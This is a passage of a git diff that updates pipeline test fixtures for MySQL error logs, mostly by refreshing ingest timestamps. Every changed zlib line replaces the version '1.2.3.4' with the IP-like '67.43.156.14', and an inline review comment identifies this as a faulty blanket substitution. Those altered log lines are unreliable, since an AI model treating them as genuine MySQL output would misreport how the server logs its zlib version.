segment(s) found. 96 redo rollback segment(s) are active.", "event": { - "ingested": "2021-06-21T12:35:17.188615981Z", + "ingested": "2021-12-09T13:41:33.115505Z", "category": [ "database" ], @@ -3540,7 +3540,7 @@ }, "message": "InnoDB: 32 non-redo rollback segment(s) are active.", "event": { - "ingested": "2021-06-21T12:35:17.188616514Z", + "ingested": "2021-12-09T13:41:33.115510200Z", "category": [ "database" ], @@ -3561,7 +3561,7 @@ }, "message": "InnoDB: Waiting for purge to start", "event": { - "ingested": "2021-06-21T12:35:17.188616971Z", + "ingested": "2021-12-09T13:41:33.115514500Z", "category": [ "database" ], @@ -3582,7 +3582,7 @@ }, "message": "InnoDB: 5.7.10 started; log sequence number 2498900", "event": { - "ingested": "2021-06-21T12:35:17.188617428Z", + "ingested": "2021-12-09T13:41:33.115519400Z", "category": [ "database" ], 
@@ -3603,7 +3603,7 @@ }, "message": "InnoDB: Loading buffer pool(s) from /usr/local/var/mysql/ib_buffer_pool", "event": { - "ingested": "2021-06-21T12:35:17.188617880Z", + "ingested": "2021-12-09T13:41:33.115525400Z", "category": [ "database" ], @@ -3624,7 +3624,7 @@ }, "message": "InnoDB: not started", "event": { - "ingested": "2021-06-21T12:35:17.188618341Z", + "ingested": "2021-12-09T13:41:33.115531400Z", "category": [ "database" ], @@ -3645,7 +3645,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:17.188618800Z", + "ingested": "2021-12-09T13:41:33.115537300Z", "category": [ "database" ], @@ -3666,7 +3666,7 @@ }, "message": "InnoDB: Buffer pool(s) load completed at 161212 12:40:39", "event": { - "ingested": "2021-06-21T12:35:17.188619249Z", + "ingested": "2021-12-09T13:41:33.115543100Z", "category": [ "database" ], @@ -3687,7 +3687,7 @@ }, "message": "Found ca.pem, server-cert.pem and server-key.pem in data directory. Trying to enable SSL support using them.", "event": { - "ingested": "2021-06-21T12:35:17.188619715Z", + "ingested": "2021-12-09T13:41:33.115548900Z", "category": [ "database" ], @@ -3708,7 +3708,7 @@ }, "message": "Skipping generation of SSL certificates as certificate files are present in data directory.", "event": { - "ingested": "2021-06-21T12:35:17.188620170Z", + "ingested": "2021-12-09T13:41:33.115554700Z", "category": [ "database" ], @@ -3729,7 +3729,7 @@ }, "message": "CA certificate ca.pem is self signed.", "event": { - "ingested": "2021-06-21T12:35:17.188620627Z", + "ingested": "2021-12-09T13:41:33.115560700Z", "category": [ "database" ], @@ -3750,7 +3750,7 @@ }, "message": "Skipping generation of RSA key pair as key files are present in data directory.", "event": { - "ingested": "2021-06-21T12:35:17.188621084Z", + "ingested": "2021-12-09T13:41:33.115566600Z", "category": [ "database" ], 
@@ -3771,7 +3771,7 @@
 },
 "message": "Server hostname (bind-address): '*'; port: 3306",
 "event": {
- "ingested": "2021-06-21T12:35:17.188621539Z",
+ "ingested": "2021-12-09T13:41:33.115572400Z",
 "category": [
 "database"
 ],
@@ -3792,7 +3792,7 @@
 },
 "message": "IPv6 is available.",
 "event": {
- "ingested": "2021-06-21T12:35:17.188621995Z",
+ "ingested": "2021-12-09T13:41:33.115578300Z",
 "category": [
 "database"
 ],
@@ -3813,7 +3813,7 @@
 },
 "message": "- '::' resolves to '::';",
 "event": {
- "ingested": "2021-06-21T12:35:17.188622447Z",
+ "ingested": "2021-12-09T13:41:33.115584100Z",
 "category": [
 "database"
 ],
@@ -3834,7 +3834,7 @@
 },
 "message": "Server socket created on IP: '::'.",
 "event": {
- "ingested": "2021-06-21T12:35:17.188622899Z",
+ "ingested": "2021-12-09T13:41:33.115590Z",
 "category": [
 "database"
 ],
@@ -3855,7 +3855,7 @@
 },
 "message": "Event Scheduler: Loaded 0 events",
 "event": {
- "ingested": "2021-06-21T12:35:17.188623380Z",
+ "ingested": "2021-12-09T13:41:33.115595900Z",
 "category": [
 "database"
 ],
@@ -3876,7 +3876,7 @@
 },
 "message": "/usr/local/Cellar/mysql/5.7.10/bin/mysqld: ready for connections.",
 "event": {
- "ingested": "2021-06-21T12:35:17.188623835Z",
+ "ingested": "2021-12-09T13:41:33.115601800Z",
 "category": [
 "database"
 ],
@@ -3890,7 +3890,7 @@
 {
 "message": "Version: '5.7.10' socket: '/tmp/mysql.sock' port: 3306 Homebrew",
 "event": {
- "ingested": "2021-06-21T12:35:17.188624289Z",
+ "ingested": "2021-12-09T13:41:33.115607600Z",
 "category": [
 "database"
 ],
diff --git a/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log b/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log
index 31aa8efdf71..8635d2a581e 100644
--- a/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log
+++ b/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log
@@ -2,7 +2,7 @@
 161209 14:18:50 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:18:50 InnoDB: The InnoDB memory heap is disabled
 161209 14:18:50 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:18:50 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:18:50 InnoDB: Compressed tables use zlib 67.43.156.14
 161209 14:18:50 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:18:50 InnoDB: Completed initialization of buffer pool
 InnoDB: The first specified data file ./ibdata1 did not exist:
@@ -28,7 +28,7 @@ InnoDB: Foreign key constraint system tables created
 161209 14:18:52 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:18:52 InnoDB: The InnoDB memory heap is disabled
 161209 14:18:52 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:18:52 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:18:52 InnoDB: Compressed tables use zlib 67.43.156.14
 161209 14:18:52 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:18:52 InnoDB: Completed initialization of buffer pool
 161209 14:18:52 InnoDB: highest supported file format is Barracuda.
@@ -45,7 +45,7 @@ ERROR: 1064 You have an error in your SQL syntax; check the manual that corresp
 161209 14:18:53 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:18:53 InnoDB: The InnoDB memory heap is disabled
 161209 14:18:53 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:18:53 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:18:53 InnoDB: Compressed tables use zlib 67.43.156.14
 161209 14:18:53 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:18:53 InnoDB: Completed initialization of buffer pool
 161209 14:18:53 InnoDB: highest supported file format is Barracuda.
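Review bot: The `1.2.3.4` in `161209 14:18:50 InnoDB: Compressed tables use zlib 1.2.3.4` is the zlib library version the server reports, not an IP address, so rewriting it to `67.43.156.14` (in every hunk of this file and in the matching `message` lines of test-mysql-ubuntu-5-5-53.log-expected.json) turns a realistic fixture into a line no MySQL server emits. The expected-output hunks for those lines change only `message` and `event.ingested`, with no `source.ip` or `related.ip` field appearing on the new side, which suggests the pipeline never treated this value as an address and the edit came from a blanket dotted-quad substitution rather than a pipeline requirement; I would keep `zlib 1.2.3.4` on both the log and the expected lines. If the substitution was scripted, other version strings that happen to look like IPv4 addresses may have been rewritten the same way and are worth a search before merging.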
@@ -62,7 +62,7 @@ ERROR: 1064 You have an error in your SQL syntax; check the manual that corresp
 161209 14:18:56 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:18:56 InnoDB: The InnoDB memory heap is disabled
 161209 14:18:56 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:18:56 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:18:56 InnoDB: Compressed tables use zlib 67.43.156.14
 161209 14:18:56 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:18:56 InnoDB: Completed initialization of buffer pool
 161209 14:18:57 InnoDB: highest supported file format is Barracuda.
@@ -85,7 +85,7 @@ Version: '5.5.53-0ubuntu0.12.04.1' socket: '/var/run/mysqld/mysqld.sock' port:
 161209 14:37:57 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:37:57 InnoDB: The InnoDB memory heap is disabled
 161209 14:37:57 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:37:57 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:37:57 InnoDB: Compressed tables use zlib 67.43.156.14
 161209 14:37:57 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:37:57 InnoDB: Completed initialization of buffer pool
 161209 14:37:57 InnoDB: highest supported file format is Barracuda.
@@ -101,7 +101,7 @@ Version: '5.5.53-0ubuntu0.12.04.1-log' socket: '/var/run/mysqld/mysqld.sock' p
 161209 14:18:50 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:18:50 InnoDB: The InnoDB memory heap is disabled
 161209 14:18:50 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:18:50 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:18:50 InnoDB: Compressed tables use zlib 67.43.156.14
 161209 14:18:50 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:18:50 InnoDB: Completed initialization of buffer pool
 InnoDB: The first specified data file ./ibdata1 did not exist:
@@ -127,7 +127,7 @@ InnoDB: Foreign key constraint system tables created
 161209 14:18:52 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:18:52 InnoDB: The InnoDB memory heap is disabled
 161209 14:18:52 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:18:52 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:18:52 InnoDB: Compressed tables use zlib 67.43.156.14
 161209 14:18:52 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:18:52 InnoDB: Completed initialization of buffer pool
 161209 14:18:52 InnoDB: highest supported file format is Barracuda.
@@ -144,7 +144,7 @@ ERROR: 1064 You have an error in your SQL syntax; check the manual that corresp
 161209 14:18:53 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:18:53 InnoDB: The InnoDB memory heap is disabled
 161209 14:18:53 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:18:53 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:18:53 InnoDB: Compressed tables use zlib 67.43.156.14
 161209 14:18:53 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:18:53 InnoDB: Completed initialization of buffer pool
 161209 14:18:53 InnoDB: highest supported file format is Barracuda.
@@ -156,7 +156,7 @@ ERROR: 1064 You have an error in your SQL syntax; check the manual that corresp
 161209 14:18:55 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:18:55 InnoDB: The InnoDB memory heap is disabled
 161209 14:18:55 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:18:55 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:18:55 InnoDB: Compressed tables use zlib 67.43.156.14
 161209 14:18:55 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:18:55 InnoDB: Completed initialization of buffer pool
 161209 14:18:55 InnoDB: highest supported file format is Barracuda.
@@ -173,7 +173,7 @@ ERROR: 1050 Table 'plugin' already exists
 161209 14:18:56 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:18:56 InnoDB: The InnoDB memory heap is disabled
 161209 14:18:56 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:18:56 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:18:56 InnoDB: Compressed tables use zlib 67.43.156.14
 161209 14:18:56 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:18:56 InnoDB: Completed initialization of buffer pool
 161209 14:18:57 InnoDB: highest supported file format is Barracuda.
@@ -196,7 +196,7 @@ Version: '5.5.53-0ubuntu0.12.04.1' socket: '/var/run/mysqld/mysqld.sock' port:
 161209 14:37:57 [Note] Plugin 'FEDERATED' is disabled.
 161209 14:37:57 InnoDB: The InnoDB memory heap is disabled
 161209 14:37:57 InnoDB: Mutexes and rw_locks use GCC atomic builtins
-161209 14:37:57 InnoDB: Compressed tables use zlib 1.2.3.4
+161209 14:37:57 InnoDB: Compressed tables use zlib 67.43.156.14
 161209 14:37:57 InnoDB: Initializing buffer pool, size = 128.0M
 161209 14:37:57 InnoDB: Completed initialization of buffer pool
 161209 14:37:57 InnoDB: highest supported file format is Barracuda.
diff --git a/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log-expected.json b/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log-expected.json
index ba7b9129ef8..78913810041 100644
--- a/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log-expected.json
+++ b/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log-expected.json
@@ -7,7 +7,7 @@
 },
 "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.",
 "event": {
- "ingested": "2021-06-21T12:35:18.730829324Z",
+ "ingested": "2021-12-09T13:41:34.472394Z",
 "category": [
 "database"
 ],
@@ -25,7 +25,7 @@
 },
 "message": "Plugin 'FEDERATED' is disabled.",
 "event": {
- "ingested": "2021-06-21T12:35:18.730835428Z",
+ "ingested": "2021-12-09T13:41:34.472404500Z",
 "category": [
 "database"
 ],
@@ -40,7 +40,7 @@
 "@timestamp": "2016-12-09T14:18:50.000Z",
 "message": "InnoDB: The InnoDB memory heap is disabled",
 "event": {
- "ingested": "2021-06-21T12:35:18.730836609Z",
+ "ingested": "2021-12-09T13:41:34.472411300Z",
 "category": [
 "database"
 ],
@@ -55,7 +55,7 @@
 "@timestamp": "2016-12-09T14:18:50.000Z",
 "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins",
 "event": {
- "ingested": "2021-06-21T12:35:18.730837916Z",
+ "ingested": "2021-12-09T13:41:34.472418Z",
 "category": [
 "database"
 ],
@@ -68,9 +68,9 @@
 },
 {
 "@timestamp": "2016-12-09T14:18:50.000Z",
- "message": "InnoDB: Compressed tables use zlib 1.2.3.4",
+ "message": "InnoDB: Compressed tables use zlib 67.43.156.14",
 "event": {
- "ingested": "2021-06-21T12:35:18.730838969Z",
+ "ingested": "2021-12-09T13:41:34.472424400Z",
 "category": [
 "database"
 ],
@@ -85,7 +85,7 @@
 "@timestamp": "2016-12-09T14:18:50.000Z",
 "message": "InnoDB: Initializing buffer pool, size = 128.0M",
 "event": {
- "ingested": "2021-06-21T12:35:18.730840306Z",
+ "ingested": "2021-12-09T13:41:34.472430800Z",
 "category": [
 "database"
 ],
@@ -100,7 +100,7 @@
 "@timestamp": "2016-12-09T14:18:50.000Z",
 "message": "InnoDB: Completed initialization of buffer pool",
 "event": {
- "ingested": "2021-06-21T12:35:18.730841999Z",
+ "ingested": "2021-12-09T13:41:34.472437100Z",
 "category": [
 "database"
 ],
@@ -114,7 +114,7 @@
 {
 "message": "InnoDB: The first specified data file ./ibdata1 did not exist:",
 "event": {
- "ingested": "2021-06-21T12:35:18.730843159Z",
+ "ingested": "2021-12-09T13:41:34.472459400Z",
 "category": [
 "database"
 ],
@@ -128,7 +128,7 @@
 {
 "message": "InnoDB: a new database to be created!",
 "event": {
- "ingested": "2021-06-21T12:35:18.730844474Z",
+ "ingested": "2021-12-09T13:41:34.472472500Z",
 "category": [
 "database"
 ],
@@ -143,7 +143,7 @@
 "@timestamp": "2016-12-09T14:18:50.000Z",
 "message": "InnoDB: Setting file ./ibdata1 size to 10 MB",
 "event": {
- "ingested": "2021-06-21T12:35:18.730845624Z",
+ "ingested": "2021-12-09T13:41:34.472481600Z",
 "category": [
 "database"
 ],
@@ -157,7 +157,7 @@
 {
 "message": "InnoDB: Database physically writes the file full: wait...",
 "event": {
- "ingested": "2021-06-21T12:35:18.730847185Z",
+ "ingested": "2021-12-09T13:41:34.472488Z",
 "category": [
 "database"
 ],
@@ -172,7 +172,7 @@
 "@timestamp": "2016-12-09T14:18:50.000Z",
 "message": "InnoDB: Log file ./ib_logfile0 did not exist: new to be created",
 "event": {
- "ingested": "2021-06-21T12:35:18.730848732Z",
+ "ingested": "2021-12-09T13:41:34.472520600Z",
 "category": [
 "database"
 ],
@@ -186,7 +186,7 @@
 {
 "message": "InnoDB: Setting log file ./ib_logfile0 size to 5 MB",
 "event": {
- "ingested": "2021-06-21T12:35:18.730849944Z",
+ "ingested": "2021-12-09T13:41:34.472528500Z",
 "category": [
 "database"
 ],
@@ -200,7 +200,7 @@
 {
 "message": "InnoDB: Database physically writes the file full: wait...",
 "event": {
- "ingested": "2021-06-21T12:35:18.730851081Z",
+ "ingested": "2021-12-09T13:41:34.472539100Z",
 "category": [
 "database"
 ],
@@ -215,7 +215,7 @@
 "@timestamp": "2016-12-09T14:18:50.000Z",
 "message": "InnoDB: Log file ./ib_logfile1 did not exist: new to be created",
 "event": {
- "ingested": "2021-06-21T12:35:18.730852483Z",
+ "ingested": "2021-12-09T13:41:34.472544200Z",
 "category": [
 "database"
 ],
@@ -229,7 +229,7 @@
 {
 "message": "InnoDB: Setting log file ./ib_logfile1 size to 5 MB",
 "event": {
- "ingested": "2021-06-21T12:35:18.730853590Z",
+ "ingested": "2021-12-09T13:41:34.472558400Z",
 "category": [
 "database"
 ],
@@ -243,7 +243,7 @@
 {
 "message": "InnoDB: Database physically writes the file full: wait...",
 "event": {
- "ingested": "2021-06-21T12:35:18.730855094Z",
+ "ingested": "2021-12-09T13:41:34.472592900Z",
 "category": [
 "database"
 ],
@@ -257,7 +257,7 @@
 {
 "message": "InnoDB: Doublewrite buffer not found: creating new",
 "event": {
- "ingested": "2021-06-21T12:35:18.730856170Z",
+ "ingested": "2021-12-09T13:41:34.472640800Z",
 "category": [
 "database"
 ],
@@ -271,7 +271,7 @@
 {
 "message": "InnoDB: Doublewrite buffer created",
 "event": {
- "ingested": "2021-06-21T12:35:18.730857870Z",
+ "ingested": "2021-12-09T13:41:34.472663700Z",
 "category": [
 "database"
 ],
@@ -285,7 +285,7 @@
 {
 "message": "InnoDB: 127 rollback segment(s) active.",
 "event": {
- "ingested": "2021-06-21T12:35:18.730858956Z",
+ "ingested": "2021-12-09T13:41:34.472673700Z",
 "category": [
 "database"
 ],
@@ -299,7 +299,7 @@
 {
 "message": "InnoDB: Creating foreign key constraint system tables",
 "event": {
- "ingested": "2021-06-21T12:35:18.730860379Z",
+ "ingested": "2021-12-09T13:41:34.472680500Z",
 "category": [
 "database"
 ],
@@ -313,7 +313,7 @@
 {
 "message": "InnoDB: Foreign key constraint system tables created",
 "event": {
- "ingested": "2021-06-21T12:35:18.730861688Z",
+ "ingested": "2021-12-09T13:41:34.472688300Z",
 "category": [
 "database"
 ],
@@ -328,7 +328,7 @@
 "@timestamp": "2016-12-09T14:18:50.000Z",
 "message": "InnoDB: Waiting for the background threads to start",
 "event": {
- "ingested": "2021-06-21T12:35:18.730862971Z",
+ "ingested": "2021-12-09T13:41:34.472696400Z",
 "category": [
 "database"
 ],
@@ -343,7 +343,7 @@
 "@timestamp": "2016-12-09T14:18:51.000Z",
 "message": "InnoDB: 5.5.53 started; log sequence number 0",
 "event": {
- "ingested": "2021-06-21T12:35:18.730864528Z",
+ "ingested": "2021-12-09T13:41:34.472719400Z",
 "category": [
 "database"
 ],
@@ -358,7 +358,7 @@
 "@timestamp": "2016-12-09T14:18:51.000Z",
 "message": "InnoDB: Starting shutdown...",
 "event": {
- "ingested": "2021-06-21T12:35:18.730865827Z",
+ "ingested": "2021-12-09T13:41:34.472732500Z",
 "category": [
 "database"
 ],
@@ -373,7 +373,7 @@
 "@timestamp": "2016-12-09T14:18:52.000Z",
 "message": "InnoDB: Shutdown completed; log sequence number 1595675",
 "event": {
- "ingested": "2021-06-21T12:35:18.730866983Z",
+ "ingested": "2021-12-09T13:41:34.472739800Z",
 "category": [
 "database"
 ],
@@ -391,7 +391,7 @@
 },
 "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.",
 "event": {
- "ingested": "2021-06-21T12:35:18.730868049Z",
+ "ingested": "2021-12-09T13:41:34.472747100Z",
 "category": [
 "database"
 ],
@@ -409,7 +409,7 @@
 },
 "message": "Plugin 'FEDERATED' is disabled.",
 "event": {
- "ingested": "2021-06-21T12:35:18.730869358Z",
+ "ingested": "2021-12-09T13:41:34.472753400Z",
 "category": [
 "database"
 ],
@@ -424,7 +424,7 @@
 "@timestamp": "2016-12-09T14:18:52.000Z",
 "message": "InnoDB: The InnoDB memory heap is disabled",
 "event": {
- "ingested": "2021-06-21T12:35:18.730870512Z",
+ "ingested": "2021-12-09T13:41:34.472758900Z",
 "category": [
 "database"
 ],
@@ -439,7 +439,7 @@
 "@timestamp": "2016-12-09T14:18:52.000Z",
 "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins",
 "event": {
- "ingested": "2021-06-21T12:35:18.730871930Z",
+ "ingested": "2021-12-09T13:41:34.472764500Z",
 "category": [
 "database"
 ],
@@ -452,9 +452,9 @@
 },
 {
 "@timestamp": "2016-12-09T14:18:52.000Z",
- "message": "InnoDB: Compressed tables use zlib 1.2.3.4",
+ "message": "InnoDB: Compressed tables use zlib 67.43.156.14",
 "event": {
- "ingested": "2021-06-21T12:35:18.730872991Z",
+ "ingested": "2021-12-09T13:41:34.472769100Z",
 "category": [
 "database"
 ],
@@ -469,7 +469,7 @@
 "@timestamp": "2016-12-09T14:18:52.000Z",
 "message": "InnoDB: Initializing buffer pool, size = 128.0M",
 "event": {
- "ingested": "2021-06-21T12:35:18.730874437Z",
+ "ingested": "2021-12-09T13:41:34.472774600Z",
 "category": [
 "database"
 ],
@@ -484,7 +484,7 @@
 "@timestamp": "2016-12-09T14:18:52.000Z",
 "message": "InnoDB: Completed initialization of buffer pool",
 "event": {
- "ingested": "2021-06-21T12:35:18.730875645Z",
+ "ingested": "2021-12-09T13:41:34.472781Z",
 "category": [
 "database"
 ],
@@ -499,7 +499,7 @@
 "@timestamp": "2016-12-09T14:18:52.000Z",
 "message": "InnoDB: highest supported file format is Barracuda.",
 "event": {
- "ingested": "2021-06-21T12:35:18.730876736Z",
+ "ingested": "2021-12-09T13:41:34.472788500Z",
 "category": [
 "database"
 ],
@@ -514,7 +514,7 @@
 "@timestamp": "2016-12-09T14:18:52.000Z",
 "message": "InnoDB: Waiting for the background threads to start",
 "event": {
- "ingested": "2021-06-21T12:35:18.730878252Z",
+ "ingested": "2021-12-09T13:41:34.472794800Z",
 "category": [
 "database"
 ],
@@ -529,7 +529,7 @@
 "@timestamp": "2016-12-09T14:18:53.000Z",
 "message": "InnoDB: 5.5.53 started; log sequence number 1595675",
 "event": {
- "ingested": "2021-06-21T12:35:18.730879465Z",
+ "ingested": "2021-12-09T13:41:34.472801500Z",
 "category": [
 "database"
 ],
@@ -543,7 +543,7 @@
 {
 "message": "ERROR: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ALTER TABLE user ADD column Show_view_priv enum('N','Y') CHARACTER SET utf8 NOT ' at line 1",
 "event": {
- "ingested": "2021-06-21T12:35:18.730880830Z",
+ "ingested": "2021-12-09T13:41:34.472807900Z",
 "category": [
 "database"
 ],
@@ -561,7 +561,7 @@
 },
 "message": "Aborting",
 "event": {
- "ingested": "2021-06-21T12:35:18.730882003Z",
+ "ingested": "2021-12-09T13:41:34.472814300Z",
 "category": [
 "database"
 ],
@@ -576,7 +576,7 @@
 {
 "message": "",
 "event": {
- "ingested": "2021-06-21T12:35:18.730883613Z",
+ "ingested": "2021-12-09T13:41:34.472819800Z",
 "category": [
 "database"
 ],
@@ -591,7 +591,7 @@
 "@timestamp": "2016-12-09T14:18:53.000Z",
 "message": "InnoDB: Starting shutdown...",
 "event": {
- "ingested": "2021-06-21T12:35:18.730884940Z",
+ "ingested": "2021-12-09T13:41:34.472826100Z",
 "category": [
 "database"
 ],
@@ -606,7 +606,7 @@
 "@timestamp": "2016-12-09T14:18:53.000Z",
 "message": "InnoDB: Shutdown completed; log sequence number 1595675",
 "event": {
- "ingested": "2021-06-21T12:35:18.730886043Z",
+ "ingested": "2021-12-09T13:41:34.472832400Z",
 "category": [
 "database"
 ],
@@ -624,7 +624,7 @@
 },
 "message": "/usr/sbin/mysqld: Shutdown complete",
 "event": {
- "ingested": "2021-06-21T12:35:18.730887331Z",
+ "ingested": "2021-12-09T13:41:34.472839100Z",
 "category": [
 "database"
 ],
@@ -638,7 +638,7 @@
 {
 "message": "",
 "event": {
- "ingested": "2021-06-21T12:35:18.730888460Z",
+ "ingested": "2021-12-09T13:41:34.472845400Z",
 "category": [
 "database"
 ],
@@ -656,7 +656,7 @@
 },
 "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.",
 "event": {
- "ingested": "2021-06-21T12:35:18.730889528Z",
+ "ingested": "2021-12-09T13:41:34.472851800Z",
 "category": [
 "database"
 ],
@@ -674,7 +674,7 @@
 },
 "message": "Plugin 'FEDERATED' is disabled.",
 "event": {
- "ingested": "2021-06-21T12:35:18.730891175Z",
+ "ingested": "2021-12-09T13:41:34.472858100Z",
 "category": [
 "database"
 ],
@@ -689,7 +689,7 @@
 "@timestamp": "2016-12-09T14:18:53.000Z",
 "message": "InnoDB: The InnoDB memory heap is disabled",
 "event": {
- "ingested": "2021-06-21T12:35:18.730896531Z",
+ "ingested": "2021-12-09T13:41:34.472864600Z",
 "category": [
 "database"
 ],
@@ -704,7 +704,7 @@
 "@timestamp": "2016-12-09T14:18:53.000Z",
 "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins",
 "event": {
- "ingested": "2021-06-21T12:35:18.730898003Z",
+ "ingested": "2021-12-09T13:41:34.472870900Z",
 "category": [
 "database"
 ],
@@ -717,9 +717,9 @@
 },
 {
 "@timestamp": "2016-12-09T14:18:53.000Z",
- "message": "InnoDB: Compressed tables use zlib 1.2.3.4",
+ "message": "InnoDB: Compressed tables use zlib 67.43.156.14",
 "event": {
- "ingested": "2021-06-21T12:35:18.730899103Z",
+ "ingested": "2021-12-09T13:41:34.472877300Z",
 "category": [
 "database"
 ],
@@ -734,7 +734,7 @@
 "@timestamp": "2016-12-09T14:18:53.000Z",
 "message": "InnoDB: Initializing buffer pool, size = 128.0M",
 "event": {
- "ingested": "2021-06-21T12:35:18.730900426Z",
+ "ingested": "2021-12-09T13:41:34.472883600Z",
 "category": [
 "database"
 ],
@@ -749,7 +749,7 @@
 "@timestamp": "2016-12-09T14:18:53.000Z",
 "message": "InnoDB: Completed initialization of buffer pool",
 "event": {
- "ingested": "2021-06-21T12:35:18.730901591Z",
+ "ingested": "2021-12-09T13:41:34.472889900Z",
 "category": [
 "database"
 ],
@@ -764,7 +764,7 @@
 "@timestamp": "2016-12-09T14:18:53.000Z",
 "message": "InnoDB: highest supported file format is Barracuda.",
 "event": {
- "ingested": "2021-06-21T12:35:18.730903089Z",
+ "ingested": "2021-12-09T13:41:34.472897600Z",
 "category": [
 "database"
 ],
@@ -779,7 +779,7 @@
 "@timestamp": "2016-12-09T14:18:53.000Z",
 "message": "InnoDB: Waiting for the background threads to start",
 "event": {
- "ingested": "2021-06-21T12:35:18.730904415Z",
+ "ingested": "2021-12-09T13:41:34.472902300Z",
 "category": [
 "database"
 ],
@@ -794,7 +794,7 @@
 "@timestamp": "2016-12-09T14:18:54.000Z",
 "message": "InnoDB: 5.5.53 started; log sequence number 1595675",
 "event": {
- "ingested": "2021-06-21T12:35:18.730905714Z",
+ "ingested": "2021-12-09T13:41:34.472907500Z",
 "category": [
 "database"
 ],
@@ -809,7 +809,7 @@
 "@timestamp": "2016-12-09T14:18:54.000Z",
 "message": "InnoDB: Starting shutdown...",
 "event": {
- "ingested": "2021-06-21T12:35:18.730906813Z",
+ "ingested": "2021-12-09T13:41:34.472913900Z",
 "category": [
 "database"
 ],
@@ -827,7 +827,7 @@
 },
 "message": "Aborting",
 "event": {
- "ingested": "2021-06-21T12:35:18.730908157Z",
+ "ingested": "2021-12-09T13:41:34.472920400Z",
 "category": [
 "database"
 ],
@@ -842,7 +842,7 @@
 {
 "message": "",
 "event": {
- "ingested": "2021-06-21T12:35:18.730909377Z",
+ "ingested": "2021-12-09T13:41:34.472926800Z",
 "category": [
 "database"
 ],
@@ -857,7 +857,7 @@
 "@timestamp": "2016-12-09T14:18:56.000Z",
 "message": "InnoDB: Starting shutdown...",
 "event": {
- "ingested": "2021-06-21T12:35:18.730910468Z",
+ "ingested": "2021-12-09T13:41:34.472933100Z",
 "category": [
 "database"
 ],
@@ -872,7 +872,7 @@
 "@timestamp": "2016-12-09T14:18:56.000Z",
 "message": "InnoDB: Shutdown completed; log sequence number 1595675",
 "event": {
- "ingested": "2021-06-21T12:35:18.730911774Z",
+ "ingested": "2021-12-09T13:41:34.472939400Z",
 "category": [
 "database"
 ],
@@ -890,7 +890,7 @@
 },
 "message": "/usr/sbin/mysqld: Shutdown complete",
 "event": {
- "ingested": "2021-06-21T12:35:18.730912859Z",
+ "ingested": "2021-12-09T13:41:34.472945700Z",
 "category": [
 "database"
 ],
@@ -904,7 +904,7 @@
 {
 "message": "",
 "event": {
- "ingested": "2021-06-21T12:35:18.730913926Z",
+ "ingested": "2021-12-09T13:41:34.472952100Z",
 "category": [
 "database"
 ],
@@ -922,7 +922,7 @@
 },
 "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.",
 "event": {
- "ingested": "2021-06-21T12:35:18.730915350Z",
+ "ingested": "2021-12-09T13:41:34.472958500Z",
 "category": [
 "database"
 ],
@@ -940,7 +940,7 @@
 },
 "message": "Plugin 'FEDERATED' is disabled.",
 "event": {
- "ingested": "2021-06-21T12:35:18.730916622Z",
+ "ingested": "2021-12-09T13:41:34.472963400Z",
 "category": [
 "database"
